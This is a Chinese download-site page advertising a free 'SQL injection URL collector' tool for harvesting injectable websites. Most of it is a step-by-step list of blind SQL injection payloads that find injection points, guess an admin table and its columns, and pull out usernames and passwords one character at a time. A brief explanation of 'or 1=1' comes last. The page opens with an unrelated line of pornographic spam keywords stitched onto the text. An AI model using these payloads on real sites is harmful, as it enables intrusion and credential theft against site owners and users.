18美女洗澡光胸光屁屁不遮挡,久久久久久久精品妇女99

阿修SQL注入網(wǎng)址采集器是可以一鍵的幫助你注入你需要的大量網(wǎng)站網(wǎng)址的，這個(gè)應(yīng)該是一些數(shù)據(jù)庫(kù)使用者有可能使用到的一款小工具，現(xiàn)在可以免費(fèi)的為你提供，有需要的可以免費(fèi)下載試試效果怎么樣！

sql注入語(yǔ)句部分展示

1.判斷有無(wú)注入點(diǎn)

; and 1=1 and 1=2

2.猜表一般的表的名稱(chēng)無(wú)非是admin adminuser user pass password 等..

and 0<>(select count(*) from *)

and 0<>(select count(*) from admin) ---判斷是否存在admin這張表

3.猜帳號(hào)數(shù)目如果遇到0< 返回正確頁(yè)面 1<返回錯(cuò)誤頁(yè)面說(shuō)明帳號(hào)數(shù)目就是1個(gè)

and 0<(select count(*) from admin)

and 1<(select count(*) from admin)

4.猜解字段名稱(chēng) 在len( ) 括號(hào)里面加上我們想到的字段名稱(chēng).

and 1=(select count(*) from admin where len(*)>0)--

and 1=(select count(*) from admin where len(用戶(hù)字段名稱(chēng)name)>0)

and 1=(select count(*) from admin where len(_blank>密碼字段名稱(chēng)password)>0)

5.猜解各個(gè)字段的長(zhǎng)度猜解長(zhǎng)度就是把>0變換直到返回正確頁(yè)面為止

and 1=(select count(*) from admin where len(*)>0)

and 1=(select count(*) from admin where len(name)>6) 錯(cuò)誤

and 1=(select count(*) from admin where len(name)>5) 正確長(zhǎng)度是6

and 1=(select count(*) from admin where len(name)=6) 正確

and 1=(select count(*) from admin where len(password)>11) 正確

and 1=(select count(*) from admin where len(password)>12) 錯(cuò)誤長(zhǎng)度是12

and 1=(select count(*) from admin where len(password)=12) 正確

6.猜解字符

and 1=(select count(*) from admin where left(name,1)=a) ---猜解用戶(hù)帳號(hào)的第一位

and 1=(select count(*) from admin where left(name,2)=ab)---猜解用戶(hù)帳號(hào)的第二位

就這樣一次加一個(gè)字符這樣猜,猜到夠你剛才猜出來(lái)的多少位了就對(duì)了,帳號(hào)就算出來(lái)了

and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --

這個(gè)查詢(xún)語(yǔ)句可以猜解中文的用戶(hù)和_blank>密碼.只要把后面的數(shù)字換成中文的 ASSIC碼就OK.最后把結(jié)果再轉(zhuǎn)換成字符.

sql注入語(yǔ)句原理

原理是基本的sql語(yǔ)句簡(jiǎn)單的說(shuō)就是把一個(gè)正常的sql語(yǔ)句的邏輯轉(zhuǎn)換成另一種不正常的sql語(yǔ)句邏輯基本的例子：查詢(xún)數(shù)據(jù) select * from tablename where id='admin' 現(xiàn)在我們查找名為admin的用戶(hù) 如果我們?cè)诤竺婕右粋€(gè) or 1=1；sql語(yǔ)句變成了 select * from tablename where id='admin' or 1=1這樣導(dǎo)致了 where 語(yǔ)句無(wú)用了。查詢(xún)出了所有的用戶(hù) 信息但是現(xiàn)在做開(kāi)發(fā)的時(shí)候，都盡量不要用sql拼接所以注入漏洞也少了。。